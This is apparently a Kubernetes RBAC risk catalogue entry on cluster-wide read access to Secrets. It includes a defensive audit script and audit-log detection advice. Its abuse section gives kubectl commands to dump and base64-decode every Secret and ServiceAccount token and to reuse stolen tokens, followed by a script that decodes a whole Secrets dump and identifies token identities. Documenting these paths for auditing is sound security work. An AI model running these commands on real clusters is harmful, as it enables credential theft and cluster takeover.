Read secrets cluster-wide
Information Disclosure
Critical
Overview
| Field | Value |
|---|---|
| ID | 1010 |
| Name | Read secrets cluster-wide |
| Risk Category | Information Disclosure |
| Risk Level | Critical |
| Role Type | ClusterRole |
| API Groups | core |
| Resources | secrets |
| Verbs | get, list, watch |
| Tags | ClusterWideSecretAccess CredentialAccess DataExposure InformationDisclosure |
Description
Grants read access to every Secret in every namespace of the cluster. This is critical because Secrets routinely hold database credentials, API keys, TLS private keys, registry credentials and ServiceAccount tokens, so a single holder of this permission can dump the cluster's credential material in one request and often pivot to full cluster compromise by reusing a token bound to a more privileged ServiceAccount. Any one of the listed verbs is enough: `list` and `watch` return complete Secret objects including `.data`, not just names, and the values are only base64-encoded, so encryption at rest does not help (the API server decrypts before serving the read). The permission is cluster-wide only when the ClusterRole is granted through a ClusterRoleBinding; the same ClusterRole referenced from a namespaced RoleBinding grants access in that namespace alone.
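To find out who actually holds this permission in a cluster, the rule pattern from the Overview table (core API group, `secrets`, any of `get`/`list`/`watch`) has to be matched against ClusterRoles, including `*` wildcards, and then joined to ClusterRoleBindings. The following audit script is an added example and not part of the original catalogue entry; it assumes two dumps produced with `kubectl get clusterroles -o json` and `kubectl get clusterrolebindings -o json`, and the sample objects embedded in it are constructed for the example.

```python
"""Report every subject that can read Secrets cluster-wide.

Added example, not code from the catalogue. Assumes these dumps exist:
  kubectl get clusterroles -o json        > clusterroles.json
  kubectl get clusterrolebindings -o json > clusterrolebindings.json
Only ClusterRoleBindings are considered: a RoleBinding that references a
ClusterRole is scoped to its own namespace and is out of scope here.
"""
import json
import sys

SECRET_READ_VERBS = {"get", "list", "watch"}


def rule_reads_secrets(rule: dict) -> bool:
    """True if a single PolicyRule reaches Secrets in the core API group
    with any read verb. Wildcards in apiGroups, resources or verbs match
    too, so cluster-admin style roles are caught. One verb suffices:
    `list` and `watch` return whole objects including .data."""
    groups = rule.get("apiGroups", [])
    resources = rule.get("resources", [])
    verbs = rule.get("verbs", [])
    core = "" in groups or "*" in groups
    secrets = "secrets" in resources or "*" in resources
    reads = "*" in verbs or bool(SECRET_READ_VERBS & set(verbs))
    return core and secrets and reads


def risky_clusterroles(clusterroles: dict) -> set:
    """Names of ClusterRoles with at least one matching rule. Aggregated
    ClusterRoles are covered because the API server materialises the
    aggregated rules into .rules (manifests on disk would not show them)."""
    return {cr["metadata"]["name"] for cr in clusterroles.get("items", [])
            if any(rule_reads_secrets(r) for r in cr.get("rules") or [])}


def cluster_wide_secret_readers(clusterroles: dict, bindings: dict) -> list:
    """(role, subject kind, subject name[, namespace]) for each subject that
    a ClusterRoleBinding ties to a risky ClusterRole."""
    risky = risky_clusterroles(clusterroles)
    found = []
    for crb in bindings.get("items", []):
        ref = crb.get("roleRef", {})
        if ref.get("kind") != "ClusterRole" or ref.get("name") not in risky:
            continue
        for subj in crb.get("subjects") or []:
            entry = (ref["name"], subj["kind"], subj["name"])
            if subj["kind"] == "ServiceAccount":
                entry += (subj.get("namespace", "default"),)
            found.append(entry)
    return sorted(found)


# --- constructed sample objects (stand-ins for the two kubectl dumps) ---
def _cr(name, rules):
    return {"kind": "ClusterRole", "metadata": {"name": name}, "rules": rules}


def _crb(name, role, subjects):
    return {"kind": "ClusterRoleBinding", "metadata": {"name": name},
            "roleRef": {"apiGroup": "rbac.authorization.k8s.io",
                        "kind": "ClusterRole", "name": role},
            "subjects": subjects}


SAMPLE_CLUSTERROLES = {"items": [
    _cr("secret-reader", [{"apiGroups": [""], "resources": ["secrets"],
                           "verbs": ["get", "list", "watch"]}]),
    _cr("cluster-admin", [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]),
    _cr("pod-reader", [{"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "list"]}]),
    _cr("secret-creator", [{"apiGroups": [""], "resources": ["secrets"], "verbs": ["create"]}]),
]}
SAMPLE_BINDINGS = {"items": [
    _crb("ci-reads-secrets", "secret-reader",
         [{"kind": "ServiceAccount", "name": "builder", "namespace": "ci"}]),
    _crb("cluster-admin", "cluster-admin",
         [{"kind": "Group", "name": "system:masters",
           "apiGroup": "rbac.authorization.k8s.io"}]),
    _crb("devs-read-pods", "pod-reader",
         [{"kind": "Group", "name": "developers",
           "apiGroup": "rbac.authorization.k8s.io"}]),
]}

if __name__ == "__main__":
    if len(sys.argv) == 3:   # python audit.py clusterroles.json clusterrolebindings.json
        roles, binds = (json.load(open(p)) for p in sys.argv[1:3])
    else:
        roles, binds = SAMPLE_CLUSTERROLES, SAMPLE_BINDINGS
    for entry in cluster_wide_secret_readers(roles, binds):
        print(*entry)
```

The `secret-creator` role is deliberately not flagged: `create` on Secrets is a different risk. Run against real dumps, expect to see `system:masters` via `cluster-admin` plus any workload ServiceAccounts that have been handed a broad read role; the latter are the findings worth fixing, usually by moving the binding to a RoleBinding in the one namespace the workload needs.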
Abuse Scenarios
- List all secrets across all namespaces. With `-o yaml` or `-o json` this is already a complete dump, since `list` returns the full objects including `.data`.

```bash
kubectl get secrets --all-namespaces
```

- Retrieve and decode a specific secret's data. Values under `.data` are base64-encoded, not encrypted, so `base64 -d` is all that is needed.

```bash
kubectl get secret <secret-name> -n <namespace> -o jsonpath='{.data.<key>}' | base64 -d
# Example: Get the default service account token
# kubectl get secret $(kubectl get sa default -n kube-system -o jsonpath='{.secrets[0].name}') -n kube-system -o jsonpath='{.data.token}' | base64 -d
```

  Note: the example relies on the legacy auto-generated token Secret listed under the ServiceAccount's `.secrets` field. On Kubernetes 1.24 and later that field is empty by default, so enumerate token Secrets directly instead: `kubectl get secrets -A --field-selector type=kubernetes.io/service-account-token`. Any such token can be used with `kubectl --token=<jwt>` to act as the ServiceAccount it was issued for.
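Decoding one key at a time with `jsonpath` and `base64 -d` does not scale to a whole cluster, and the most valuable items in the dump are the ServiceAccount tokens, because each one is a ready-to-use identity. The script below is an added example, not part of the original catalogue entry; it assumes a dump produced with `kubectl get secrets --all-namespaces -o json`, decodes every key, and for `kubernetes.io/service-account-token` Secrets reads the JWT payload (without verifying the signature) to show which ServiceAccount the token asserts. The embedded `SAMPLE_DUMP`, including the unsigned JWT, is constructed for the example.

```python
"""Post-process a cluster-wide Secrets dump.

Added example, not code from the catalogue. Assumes:
  kubectl get secrets --all-namespaces -o json > secrets.json
and then:  python dump_secrets.py secrets.json
Without an argument it runs on the constructed SAMPLE_DUMP below.
"""
import base64
import json
import sys


def _b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _fake_sa_jwt(namespace: str, sa_name: str) -> str:
    """Build an UNSIGNED service-account style JWT for the sample data only."""
    header = _b64url(json.dumps({"alg": "RS256", "kid": "constructed"}).encode())
    payload = _b64url(json.dumps({
        "iss": "kubernetes/serviceaccount",
        "kubernetes.io/serviceaccount/namespace": namespace,
        "kubernetes.io/serviceaccount/service-account.name": sa_name,
        "sub": f"system:serviceaccount:{namespace}:{sa_name}",
    }).encode())
    return f"{header}.{payload}.{_b64url(b'not-a-real-signature')}"


def _secret(name, namespace, stype, data):
    """Constructed Secret object with .data base64-encoded as the API returns it."""
    return {"metadata": {"name": name, "namespace": namespace}, "type": stype,
            "data": {k: base64.b64encode(v.encode()).decode() for k, v in data.items()}}


# Constructed stand-in for `kubectl get secrets -A -o json` output.
SAMPLE_DUMP = {"kind": "SecretList", "items": [
    _secret("db-creds", "payments", "Opaque",
            {"username": "app", "password": "s3cr3t-example"}),
    _secret("builder-token", "ci", "kubernetes.io/service-account-token",
            {"token": _fake_sa_jwt("ci", "builder"), "namespace": "ci"}),
    _secret("tls-cert", "ingress", "kubernetes.io/tls",
            {"tls.crt": "-----BEGIN CERTIFICATE-----...",
             "tls.key": "-----BEGIN PRIVATE KEY-----..."}),
]}


def decode_secret(secret: dict) -> dict:
    """Decode every key of .data (the per-key equivalent of `base64 -d`)."""
    out = {}
    for key, b64 in (secret.get("data") or {}).items():
        raw = base64.b64decode(b64)
        try:
            out[key] = raw.decode()
        except UnicodeDecodeError:
            out[key] = raw.hex()   # binary payloads (e.g. PKCS#12 bundles) as hex
    return out


def jwt_claims(token: str) -> dict:
    """Payload claims of a JWT, read WITHOUT verifying the signature.
    That is all an attacker needs to learn which identity a stolen token carries."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a JWT")
    payload = parts[1] + "=" * (-len(parts[1]) % 4)
    return json.loads(base64.urlsafe_b64decode(payload))


def summarize_dump(dump: dict) -> list:
    """One record per Secret: location, type, decoded key names, and for
    service-account tokens the subject the token asserts."""
    records = []
    for item in dump.get("items", []):
        meta = item["metadata"]
        decoded = decode_secret(item)
        rec = {"namespace": meta["namespace"], "name": meta["name"],
               "type": item.get("type", "Opaque"), "keys": sorted(decoded)}
        if rec["type"] == "kubernetes.io/service-account-token" and "token" in decoded:
            rec["subject"] = jwt_claims(decoded["token"]).get("sub")
        records.append(rec)
    return records


if __name__ == "__main__":
    dump = json.load(open(sys.argv[1])) if len(sys.argv) > 1 else SAMPLE_DUMP
    for rec in summarize_dump(dump):
        print(json.dumps(rec))
```

The summary deliberately prints key names and token subjects rather than the decoded values themselves, so the output can be kept as evidence of exposure scope; `decode_secret` is there when a specific value is needed. On the defensive side, the same signal is visible in API audit logs as a `list` or `get` on `secrets` with no namespace in the request URI, which is a cheap detection for this permission being exercised.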